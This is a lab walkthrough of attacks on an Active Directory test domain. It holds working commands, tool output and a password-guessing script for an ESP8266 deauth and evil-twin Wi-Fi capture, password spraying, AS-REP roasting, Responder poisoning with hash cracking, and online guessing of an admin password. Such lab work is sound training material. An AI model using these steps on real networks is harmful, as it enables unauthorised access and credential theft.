🎯 Overview
Building an isolated lab environment to understand, demonstrate, and mitigate attacks against Active Directory, with several attack scenarios played through end to end.
🔧 Technical Details
The lab runs locally on a laptop. Requirements:
- VirtualBox (free, no admin rights required)
- Windows Server 2012 R2 ISO (evaluation, 4.0 GB): 10.0.2.10, domain controller (DC01)
- Windows 10 ISO (evaluation, 5.5 GB): 10.0.2.20, initial target (CLIENT01)
- Kali Linux OVA (pre-built, 3.5 GB): 10.0.2.100, attacker
- ESP8266 board: evil-twin / deauther access point
- Domain: lab.local
- Arduino IDE, latest version
Architecture (the diagram is not reproduced here): the three VMs sit on the VirtualBox NAT network NatforAD, 10.0.2.0/24, gateway 10.0.2.1. The ESP8266 is a separate physical device on the Wi-Fi side and is only used for the initial Wi-Fi credential capture.
⚡ Build Lab
STEP 1: SETUP VIRTUALBOX NETWORK
Create a custom NAT Network with these settings: Name "NatforAD", Subnet 10.0.2.0/24, Gateway 10.0.2.1, DHCP enabled. The Windows VMs get static addresses below; DHCP only serves the Kali OVA's default configuration.
STEP 2: INSTALL DOMAIN CONTROLLER (DC01)
VM specification:
- PC Name: DC01
- OS: Windows Server 2012 R2 with GUI
- RAM: 4096 MB
- Storage: 50 GB
- Network: NatforAD
Configure DC:
PowerShell, run as administrator
powershell
# 1. Set a static IP and point DNS at this host (it becomes the DNS server after promotion)
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 10.0.2.10 -PrefixLength 24 -DefaultGateway 10.0.2.1
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 10.0.2.10
# 2. Rename the computer (this reboots; continue with step 3 after the restart)
Rename-Computer -NewName "DC01" -Restart
# 3. Install AD Domain Services
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
# 4. Promote to domain controller
#    Domain: lab.local
#    Forest functional level: Windows Server 2012 R2
#    DSRM password: DSRM@Lab2024!
#    (the server reboots when promotion finishes)
Install-ADDSForest -DomainName "lab.local" -ForestMode "Win2012R2" -DomainMode "Win2012R2" -InstallDns `
    -SafeModeAdministratorPassword (ConvertTo-SecureString "DSRM@Lab2024!" -AsPlainText -Force) -Force
STEP 3: CREATE USERS FOR THE ATTACK SCENARIOS
Organizational unit (PowerShell on DC01):
powershell
New-ADOrganizationalUnit -Name "Targets" -Path "DC=lab,DC=local"
User accounts:
- regularuser: a standard domain user with no admin rights
(The enumeration in the exploit section shows the other accounts present in this lab: vulnuser, svc_backup, itsupport and localadmin.)
SPN configuration on Server 2012 R2
Registering an SPN on a user account is what makes that account a Kerberoasting target. Format:
powershell
# svc_backup must already exist as a domain user
Set-ADUser -Identity svc_backup -Add @{servicePrincipalName="MSSQLSvc/dc01.lab.local"}
STEP 4: SETUP WINDOWS CLIENT (CLIENT01)
Specifications:
- Name: CLIENT01
- OS: Windows 10 Pro
- RAM: 2048 MB
- Storage: 40 GB
- Network: NatforAD
Configuration:
powershell
# 1. Set IP Static
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 10.0.2.20 -PrefixLength 24 -DefaultGateway 10.0.2.1
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 10.0.2.10
# 2. Join the domain (enter LAB\Administrator credentials when prompted; the client reboots)
Add-Computer -DomainName "lab.local" -Credential (Get-Credential) -Restart
# Log in with: LAB\regularuser / Password123!
STEP 5: SETUP ATTACKER MACHINE (KALI LINUX)
Specifications:
- Image: Kali Linux VirtualBox OVA
- RAM: 2048 MB
- Storage: 20 GB
- Network: NatforAD
Configuration:
bash
# Point DNS at the DC so lab.local names resolve
echo "nameserver 10.0.2.10" | sudo tee /etc/resolv.conf
# Test connectivity and name resolution
ping -c 3 10.0.2.10
nslookup lab.local
5.1 DNS Resolution Issues in Kali
Solution:
bash
sudo nano /etc/resolv.conf
# Replace the contents with: nameserver 10.0.2.10
If the entry keeps disappearing, the NAT network's DHCP lease is rewriting resolv.conf; set the DNS server on the NetworkManager connection instead of editing the file by hand.
STEP 6: SETUP EVILTWIN
Firmware: https://github.com/p3tr0s/PhiSiFi
- Install Arduino IDE
- In Arduino go to File -> Preferences add this URL to Additional Boards Manager URLs -> https://raw.githubusercontent.com/SpacehuhnTech/arduino/main/package_spacehuhn_index.json
- In Arduino go to Tools -> Board -> Boards Manager search for and install the deauther package
- Download and open PhiSiFi with Arduino IDE
- Select an ESP8266 Deauther board in Arduino under tools -> board
- Connect your device and select the serial port in Arduino under tools -> port
- Click Upload button
How to use:
- Connect to the AP named WiPhi_34732 with password d347h320 from your phone/PC.
- Select the target AP you want to attack (the list of available APs refreshes every 30 seconds; reload the page to see it).
- Click Start Deauthing to start kicking devices off the selected network.
- Click Start Evil-Twin and optionally reconnect to the newly created AP, which has the same name as your target (it will be open).
- You can stop any of the attacks by visiting 192.168.4.1/admin while connected to the Evil-Twin AP, or by resetting the ESP8266.
- Once a correct password is found (the firmware only reports a password it could use to join the real network), the AP restarts with the default SSID WiPhi_34732 / d347h320 and at the bottom of the table you should see something like "Successfully got password for TARGET_SSID: PASSWORD".
- If you power down or hard-reset the board, the gathered info is lost.
🧪 Exploit
Scenario
Gain access to the Wi-Fi network with an evil-twin attack. After a victim connects to the rogue access point, harvest credentials. The objective is to obtain valid user credentials and escalate until Active Directory can be accessed with a privileged account.
Attack phases against AD (mapped to MITRE ATT&CK):
1. Pre-Reconnaissance: join the office Wi-Fi network
Attack name: Rogue Access Point Attack
Technique: evil twin with credential harvesting
Steps:
a. Connect to the Wi-Fi WiPhi_34732 with password d347h320
b. Visit 192.168.4.1/admin
c. Choose the Wi-Fi network to deauthenticate
d. Start the deauth attack to drop the sessions of users connected to that network
e. Keep the target SSID selected and start the evil twin
f. Wait until a user enters the password and the SSID WiPhi_34732 appears again
g. Read the Wi-Fi password from the admin page
Result: successfully connected to the company Wi-Fi. Tools: ESP8266 Deauther (PhiSiFi)
2. Reconnaissance: information gathering (MITRE ATT&CK TA0043). This phase collects as much information as possible about the target environment.
- nmap, host discovery: find live hosts on 10.0.2.0/24
  Command: sudo nmap -sn 10.0.2.0/24
  Result:
  Nmap scan report for 10.0.2.1   Host is up (0.00024s latency).
  Nmap scan report for 10.0.2.10  Host is up (0.00023s latency).
  Nmap scan report for 10.0.2.20  Host is up (0.0012s latency).
  Nmap scan report for 10.0.2.100 Host is up. (Kali, the attacker itself)
- nmap, quick port scan
  Command: nmap --top-ports 50 10.0.2.10 10.0.2.20
  Result:
  Nmap scan report for 10.0.2.10
  Host is up (0.0012s latency).
  Not shown: 46 filtered tcp ports (no-response)
  PORT      STATE SERVICE
  53/tcp    open  domain
  135/tcp   open  msrpc
  445/tcp   open  microsoft-ds
  49154/tcp open  unknown
  MAC Address: 08:00:27:F5:05:30 (Oracle VirtualBox virtual NIC)
  Nmap scan report for 10.0.2.20
  Host is up (0.0040s latency).
  Not shown: 47 closed tcp ports (reset)
  PORT    STATE SERVICE
  135/tcp open  msrpc
  139/tcp open  netbios-ssn
  445/tcp open  microsoft-ds
  MAC Address: 08:00:27:3C:06:2A (Oracle VirtualBox virtual NIC)
  Caveat: Kerberos (88) and LDAP (389) are not among nmap's 50 most common ports, so this scan understates what the DC exposes (ldapsearch below talks to 389 just fine); a full scan (nmap -p- 10.0.2.10) shows them.
- smbclient, SMB null-session attempt
  Command: smbclient -N -L //10.0.2.10 ; smbclient -N -L //10.0.2.20
  Result: session setup failed: NT_STATUS_ACCESS_DENIED (on both hosts)
- nbtscan, NetBIOS enumeration of Windows hosts
  Command: nbtscan -r 10.0.2.0/24
  Result: 10.0.2.20 : NetBIOS Name: CLIENT01, MAC Address: 08:00:27:3c:06:2a
- ldapsearch, unauthenticated LDAP rootDSE query
  Command: ldapsearch -x -H ldap://10.0.2.10 -b "" -s base "(objectclass=*)" 2>/dev/null
  Result: dnsHostName: DC01.lab.local
Conclusions from the recon stage:
- Several hosts are live in 10.0.2.0/24, and each exposes a few open ports.
- Anonymous (null-session) listing of SMB shares is denied on both hosts, so share enumeration requires valid credentials.
- nbtscan identified the Windows client CLIENT01 at 10.0.2.20.
- The unauthenticated LDAP rootDSE query on 10.0.2.10 returned the DNS hostname DC01.lab.local, identifying the domain controller.
- dnsrecon returned nothing for this range, probably because zone transfers are refused.
- So DC01 is 10.0.2.10 and CLIENT01 is 10.0.2.20, and the open SMB/RPC ports are the candidates for initial access.
3. Initial Access: getting in. This phase tries to get a foothold inside the target environment using the information collected during reconnaissance.
a. crackmapexec, password spraying
Command: crackmapexec smb 10.0.2.20 -d lab.local -u users_spray.txt -p passwords_spray.txt --continue-on-success
Result: no spray attempt succeeded.
Caveat: each failed guess counts toward the domain lockout threshold for that user, so a spray should try one password across all users per round and stay below the threshold within the observation window.
b. AS-REP Roasting. Attack name: abuse of accounts that do not require Kerberos pre-authentication. Tool: Impacket GetNPUsers
Command: python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py lab.local/ -no-pass -usersfile ~/wordlist/users_asrep.txt -dc-ip 10.0.2.10
Result:
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User regularuser doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User localadmin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Every user in the list has Kerberos pre-authentication enabled, so AS-REP roasting does not apply to them. The two KDC_ERR_CLIENT_REVOKED lines are still information: the KDC returns that error only for accounts that exist but are disabled, expired or locked out (possibly a side effect of the spray in step a). This unauthenticated run only tests the names in users_asrep.txt; vulnuser is not in that list, which is why it is only found in phase 5 once a valid credential is available.
c. LLMNR/NBT-NS poisoning. Attack name: name resolution poisoning. Tool: Responder
Keep the listener running:
Command: sudo responder -I eth0 -wv
Then wait for a user on CLIENT01 to mistype a host or share name (for example in Explorer): Windows falls back to LLMNR/NBT-NS broadcasts for the unknown name, Responder answers them, and the client sends its NetNTLMv2 challenge-response to the attacker.
After the poisoning, copy the captured hash out of the session log:
sudo cat /usr/share/responder/logs/Responder-Session.log | grep "regularuser" > ~/wordlist/captured_hash.txt
(Responder also writes each capture, already in john format, to /usr/share/responder/logs/SMB-NTLMv2-SSP-<client-ip>.txt.)
Put the hash line into John the Ripper's netntlmv2 format (user::DOMAIN:challenge:response):
cat > john_hash.txt << EOF
regularuser::LAB:3969f82da0cf5eb[hash truncated]
EOF
Crack it with John the Ripper using a prepared wordlist or a common one such as rockyou.txt:
john --format=netntlmv2 --wordlist=passwords_john.txt john_hash.txt
Result of the cracking run:
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123@ (regularuser)
1g 0:00:00:00 DONE (2026-01-28 15:34) 33.33g/s 433.3p/s 433.3c/s 433.3C/s Password123..Password123@
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Bingo: the regularuser password is Password123@
Because the hash has already been cracked, john's pot file caches the result; display it again with:
john --show john_hash.txt
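A small helper for this step, added here as an example and not part of the original write-up: it reads Responder's session log, keeps one NetNTLMv2 hash per user and prints lines that john accepts as netntlmv2 (hashcat mode 5600). The log excerpt and every hex value in it are constructed for the example, not a real capture.

```bash
#!/usr/bin/env bash
# Added example: Responder session log -> john/hashcat NetNTLMv2 lines.
# Responder logs a capture as
#   [SMB] NTLMv2-SSP Hash     : USER::DOMAIN:serverchallenge:ntproofstr:blob
# which is already the john "netntlmv2" / hashcat "-m 5600" format, so the
# work is only to strip the prefix and drop repeat captures of the same user.
# RESPONDER_SAMPLE is constructed for this example; the hex values are made up.
RESPONDER_SAMPLE='[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 10.0.2.20
[SMB] NTLMv2-SSP Username : LAB\regularuser
[SMB] NTLMv2-SSP Hash     : regularuser::LAB:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000deadbeef
[SMB] NTLMv2-SSP Client   : 10.0.2.20
[SMB] NTLMv2-SSP Username : LAB\regularuser
[SMB] NTLMv2-SSP Hash     : regularuser::LAB:8877665544332211:ffeeddccbbaa99887766554433221100:0101000000000000cafebabe
[HTTP] NTLMv2 Client   : 10.0.2.20
[HTTP] NTLMv2 Username : LAB\itsupport
[HTTP] NTLMv2 Hash     : itsupport::LAB:0123456789abcdef:fedcba9876543210fedcba9876543210:0101000000000000feedface'

# stdin: Responder-Session.log; stdout: one hash line per distinct username.
# A user that authenticated several times yields several hashes; each one
# cracks to the same password, so keeping the first is enough for john.
responder_to_john() {
  grep -E '^\[[A-Z-]+\] NTLMv2(-SSP)? Hash' \
    | sed -E 's/^.*Hash[[:space:]]*:[[:space:]]*//' \
    | awk -F'::' '!seen[tolower($1)]++'
}

# Sanity check for one line: user::domain:16-hex-challenge:32-hex-proof:hex-blob
is_netntlmv2() {
  printf '%s\n' "$1" | grep -Eq '^[^:]+::[^:]+:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$'
}

# Demo on the constructed sample; on Kali feed the real log instead:
#   sudo cat /usr/share/responder/logs/Responder-Session.log | responder_to_john > john_hash.txt
printf '%s\n' "$RESPONDER_SAMPLE" | responder_to_john
```

The output goes straight into `john --format=netntlmv2 --wordlist=... john_hash.txt`; the `is_netntlmv2` check is worth running on each line first, because a line mangled by a copy-paste (a missing field, a stray space) makes john silently skip the hash rather than fail.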
Conclusion: of the three initial-access methods tried, one succeeded, and it gave us the regularuser password Password123@.
4. Lateral Movement: moving through the environment. First, test SMB access with the account we have:
smbclient -L //10.0.2.20 -U 'lab.local/regularuser%Password123@'
Result: the SMB connection succeeds, but only the default shares are listed, and they are read-only for this user (no write, no execution).
Further attempts:
a. SMB lateral movement. Attack name: remote service execution via SMB. Tool: Impacket smbexec
Command:
python3 /usr/share/doc/python3-impacket/examples/smbexec.py lab.local/regularuser:Password123@@10.0.2.20
Result:
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smbexec creates a service on the target, which needs local administrator rights; regularuser has none on CLIENT01, which is the right state for a standard user.
b. WMI lateral movement. Attack name: Windows Management Instrumentation. Tool: Impacket wmiexec
Command: python3 /usr/share/doc/python3-impacket/examples/wmiexec.py lab.local/regularuser:Password123@@10.0.2.20
Result: failed, ACCESS_DENIED (remote WMI execution also requires local administrator rights)
c. RDP access attempt. Attack name: Remote Desktop Protocol. Tool: xfreerdp3
Command: xfreerdp3 /v:10.0.2.20 /u:regularuser /p:'Password123@' /d:lab.local
Result: RDP port closed (3389 was not open in the port scan)
Conclusion: 1. Every lateral-movement method fails for regularuser. 2. The account has no remote-execution rights on CLIENT01. 3. We need a more privileged account.
5. Privilege Escalation: moving to a privileged account. Using the account we have, look for other users.
a. Domain user enumeration. Attack name: Active Directory reconnaissance. Tools: rpcclient, crackmapexec
Command:
rpcclient -U 'lab.local\regularuser%Password123@' 10.0.2.10 -c "enumdomusers"
Result:
user:[Administrator] rid:[0x1f4]  (RID 500)  primary target
user:[Guest] rid:[0x1f5]          (RID 501)  default guest account
user:[krbtgt] rid:[0x1f6]         (RID 502)  Kerberos service account (Golden Ticket potential)
user:[vulnuser] rid:[0x450]       (RID 1104) possibly vulnerable account
user:[svc_backup] rid:[0x451]     (RID 1105) service account (high privilege potential)
user:[regularuser] rid:[0x452]    (RID 1106) the account we currently hold
user:[itsupport] rid:[0x456]      (RID 1110) IT staff account
user:[localadmin] rid:[0x457]     (RID 1111) local admin account
We found 8 users; the first one to go after is vulnuser.
b. AS-REP Roasting (vulnuser). Attack name: Kerberos ticket harvesting. Tool: Impacket GetNPUsers
Command: python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py lab.local/regularuser:Password123@ -dc-ip 10.0.2.10 -request -format hashcat -outputfile asrep_hashes.txt
With a valid credential GetNPUsers enumerates the domain's users itself (no -usersfile needed), which is why vulnuser shows up now although the unauthenticated run in phase 3 missed it.
Result: hash obtained for vulnuser
$krb5asrep$23$vulnuser@LAB.LOCAL:5615b31a3ed019d2b0bd853f6c79dfe3$31b4751389a0bba49b8d7b9b26cb371bc2c14a504a865b183941b62e0307753c2e710e8733e65cdfcaf772e7192685f1dc845534059176a4aaf14bb4031583fef97c0477fd321d3d68a36f53da9a6890d1df70c1669662c129016359b0bd22440bd675bf79de1abe036bbcf6b7da30faa34fe51365ed9d930ce8914d2d3a5db1b88ae103be0d313ba2650da22c4f1d0d3718191bc1bd198ec9b326cd1d10f5942f4cc615447f24dece359e7c5b759d853c6636a0ed975c179ae7d272a31ae45a9add65335af1f5689a28f76f1f4355fcdbee493373a685fb0d3680734429736a2179432b735e
The $krb5asrep$23$ prefix is hashcat mode 18200 (john format krb5asrep). This write-up does not crack it and moves on to itsupport instead.
c. Password Cracking Attack. Attack name: pattern-based password guessing. Tools: custom bash script + crackmapexec
Caveat: this is online guessing against the DC, so every attempt counts toward the lockout threshold for itsupport. The candidate lists are deliberately short, the duplicate "!" in the original special-character list has been removed so no attempt is wasted, and one consistent timeout replaces the 2-second one the first phase used (too short for an SMB authentication round trip, so it could hide a hit).
Script (crack_itsupport.sh):
bash
#!/bin/bash
# Online password guessing for itsupport over SMB against the DC.
TARGET=10.0.2.10
TARGET_USER=itsupport
DOMAIN=lab.local

# One attempt. crackmapexec prints "(Pwn3d!)" only when the credential is valid
# AND has admin rights on the target; a valid non-admin credential shows "[+]" without it.
try_password() {
    local pass="$1"
    echo -n "  $pass ... "
    if timeout 15 crackmapexec smb "$TARGET" -u "$TARGET_USER" -p "$pass" -d "$DOMAIN" 2>&1 | grep -q "Pwn3d"; then
        echo "SUCCESS"
        echo "Password: $pass"
        exit 0
    fi
    echo "no"
}

echo "=========================================="
echo " CRACKING itsupport (DOMAIN ADMIN) "
echo "=========================================="

# Phase 1: simple passwords
echo "[PHASE 1] Testing simple passwords..."
for pass in "itsupport" "Itsupport123" "Password123@" "Lab@2024" "Welcome123"; do
    try_password "$pass"
done

# Phase 2: common IT passwords
echo "[PHASE 2] Testing common IT passwords..."
for pass in "Support123" "Helpdesk2024" "ITadmin123" "Admin2024" "P@ssw0rd123"; do
    try_password "$pass"
done

# Phase 3: IT@Password patterns (base x number x special character),
# same order as before: IT@Password, then IT@password, then ITPassword
echo "[PHASE 3] Testing IT@Password patterns..."
for num in "" "123" "1234" "2024" "2023" "2022"; do
    for special in "" "!" "@" "#" "$"; do
        for base in "IT@Password" "IT@password" "ITPassword"; do
            try_password "${base}${num}${special}"
        done
    done
done

echo "=========================================="
echo "All attempts failed. Try a different approach."
Run it with: chmod +x crack_itsupport.sh && ./crack_itsupport.sh
Test the new itsupport credential against the DC with wmiexec:
Command: python3 /usr/share/doc/python3-impacket/examples/wmiexec.py 'lab.local/itsupport:IT@Password123!@10.0.2.10'
Run whoami in the resulting shell to confirm who you are.
Bingo: the itsupport password is IT@Password123! (found by the phase 3 pattern loop), and since wmiexec works on the domain controller the account has administrative privileges there.